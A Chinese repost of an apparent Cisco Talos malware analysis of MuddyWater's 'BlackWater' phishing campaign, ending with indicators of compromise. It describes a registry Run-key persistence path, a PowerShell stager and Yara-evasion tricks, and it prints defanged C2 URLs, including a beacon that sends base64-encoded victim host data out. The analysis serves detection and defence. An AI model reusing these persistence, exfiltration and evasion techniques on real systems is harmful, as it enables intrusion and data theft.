内容简介:Cisco Talos团队近期发现名为“BlackWater”的恶意活动与可疑的持续威胁组织MuddyWater相关联。在2019年4月,我们开始监测到新型样本,并对其进行分析,结果表明攻击者已经在常规的运营活动中添加了三个不同的步骤,允许恶意软件绕过某些安全控制,并且MuddyWater的策略、技术和流程(TTPs)已经发展到逃避检测阶段。一旦成功,该恶意软件系列会将基于PowerShell的后门安装到受害者的计算机上,从而为威胁参与者提供远程访问的权限。尽管新型恶意活动表明,威胁参与者正在采取措施来提高
摘要
Cisco Talos团队近期发现名为“BlackWater”的恶意活动与可疑的持续威胁组织MuddyWater相关联。在2019年4月,我们开始监测到新型样本,并对其进行分析,结果表明攻击者已经在常规的运营活动中添加了三个不同的步骤,允许恶意软件绕过某些安全控制,并且MuddyWater的策略、技术和流程(TTPs)已经发展到逃避检测阶段。一旦成功,该恶意软件系列会将基于PowerShell的后门安装到受害者的计算机上,从而为威胁参与者提供远程访问的权限。尽管新型恶意活动表明,威胁参与者正在采取措施来提高其运营过程的安全性,并尽可能逃避终端检测,但我们发现其基础代码仍然保持不变。本文中所描述的分析成果将有助于威胁分析团队识别MuddyWater最新的TTP。
在最新的恶意活动中,威胁行为者首先添加了一个经过混淆后的Visual Basic for Applications(VBA)脚本,通过创建注册表项的方式来建立持久性。接下来,该脚本将触发PowerShell Stager,可能是为了伪装成红方工具,而不会被认为是高级威胁。随后,Stager将与一个威胁行为者控制的服务器进行通信,以获得FruityC2代理脚本的一个组件,这是GitHub上的一个开源框架,可以进一步枚举主机。这样一来,威胁参与者就可以监控Web日志,并确定未参与活动的某人是否向其服务器发出请求以尝试调查该活动。一旦枚举命令运行,代理将与不同的C2进行通信,并在URL字段中发回数据。这样一来,基于主机的检测将会变得更加困难,因为这一过程中并不会生成易于识别的“errors.txt”文件。威胁参与者还采取了额外的步骤来替换近期最新样本中的一些变量字符串,这可能是为了避免根据Yara规则进行基于签名的检测。
在近几个月内观察到的相关恶意样本显示,恶意活动的复杂程度不断增加。一些疑似与MuddyWater相关的样本表明,在2019年2月至3月期间,威胁参与者在受感染的主机上创建了持久性,并使用PowerShell命令枚举受害者的主机IP地址以及命令与控制(C2)服务器的IP地址。所有这些组件都包含在木马化的附件里,因此安全人员只需获得文档的样本,即可发现攻击者的TTP。与之相比,4月发生的恶意活动需要采取多步骤的调查方法。
BlackWater文档分析
Talos团队发现有证据表明恶意样本疑似与恶意组织MuddyWater有关。MuddyWater自2017年11月起至今一直活跃,并且主要针对中东地区的实体。我们有一定证据判断,这些文件是通过网络钓鱼电子邮件的方式发送给受害者的。其中的一个木马文件创建于2019年4月23日,其原始文件的标题是“company information list.doc”。
文档打开后,它会提示用户启用名称为“BlackWater.bas”的宏。威胁行为者对宏添加了密码保护,如果用户试图在Visual Basic中查看宏,可能会发现该宏无法访问,这可能是一种防逆向技术。威胁行为者使用了替换密码对“blackWater.bas”宏进行了混淆,并使用相应的整数来替换字符。
宏运行时的截图:
该宏中包含一个PowerShell脚本,可以在“运行”注册表项KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding中添加条目,从而保证持久性。然后脚本每300秒调用一次文件“\ProgramData\SysTextEnc.ini”。SysTextEnc.ini的明文版本似乎是一个轻量级的Stager。
从文档中找到的Stager的屏幕截图:
随后,Stager连接位于hxxp://38[.]132[.]99[.]167/crf.txt的威胁行为者控制的C2服务器。crf.txt文件的明文版本非常类似于MuddyWater组织在以土耳其的Krudish政治组织为目标时使用的PowerShell代理。下面的截图中展示了PowerShell木马的前几行。攻击者做了一些微小的改动,例如:修改变量名以避免Yara检测,将命令结果发送到URL中的C2而不是直接将它们写入文件。但是,尽管有上述这些改动,但恶意软件的基本功能仍然是几乎没有变化。值得注意的是,用于枚举主机的许多PowerShell命令似乎是从名为FruityC2的GitHub项目中派生出来的。
针对Krudish政治组织发起攻击的恶意文档中嵌入的PowerShell脚本:
来自威胁行为者所控制服务器的PowerShell脚本:
这一系列命令,首先会向C2服务器发送hello消息,然后每隔300秒发送一次后续的hello消息。该信标的一个示例是“hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”。值得注意的是,木马化恶意文档的宏也被称为“BlackWater”,并且该值“BlackWater”也被以硬编码的格式写入到PowerShell脚本中。
接下来,该脚本将枚举受害者的主机。大多数PowerShell命令都会调用Windows Management Instrumentation(WMI),然后查询如下信息:
1. 操作系统的名称(即主机名称);
2. 操作系统的OS架构;
3. 操作系统的版本;
4. 计算机系统的域名;
5. 计算机系统的用户名;
6. 计算机的公网IP地址。
在这里,唯一一个没有调用WMI的命令是“System.Security.Cryptography.MD5CryptoServiceProvider.ComputerHash”,这是获取安全系统的MD5哈希值的命令。如果多个工作站在同一网络中被攻陷,那么可能会获取工作站的唯一标识。在获取基于主机的枚举信息之后,它将进行Base64编码,然后将编码后的内容附加到URL POST请求中发送至C2。而在以前的版本中,该信息被写入到文本文件中。编码后命令的示例如下所示:
hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE=
经过解码后,上述命令将变得更加清晰:
hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\admin*192.168.000.01
总结
除了本文中描述的新型反检测方法之外,MuddyWater组织还进行了少量修改,以避免常见的基于主机的特征检测方法,并替换变量名称以逃避Yara特征检测。但这些变化是非常简单的,因为其基础代码库和植入功能仍然基本保持不变。然而,尽管这些修改非常微小,但它们足以避免某些检测机制。在上个月,MuddyWater的一些恶意活动被公开披露,但该组织没有受到这方面的影响,持续开展恶意活动。基于上述观察以及MuddyWater针对土耳其实体的历史恶意活动,我们有理由判断,这一系列恶意活动与MuddyWater恶意组织相关。
IoC
恶意样本哈希值
0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad
9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7
0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2
A3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da981
6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad
Bef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6
B2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93
4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60
576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf
062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717
URL
hxxp://38[.]132[.]99[.]167/crf.txt
hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater
hxxp://82[.]102[.]8[.]101/bcerrxy.php?
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/
hxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df
hxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh
hxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG
检测
Doc.Dropper.Pwshell::malicious.tht.talos
以上所述就是小编给大家介绍的《使用新型反检测技术:与MuddyWater相关的BlackWater恶意活动分析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- 浅析恶意Office文档检测技术
- 无线干扰及检测技术
- 自然场景人脸检测技术实践
- 基于全流量权限漏洞检测技术
- 一种通用递归深度检测技术 - 基于栈帧内容的检测 - Golang语言描述
- 银河水滴智能工业检测技术为中国智造赋能,连续获得订单
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Introduction to Computation and Programming Using Python
John V. Guttag / The MIT Press / 2013-7 / USD 25.00
This book introduces students with little or no prior programming experience to the art of computational problem solving using Python and various Python libraries, including PyLab. It provides student......一起来看看 《Introduction to Computation and Programming Using Python》 这本书的介绍吧!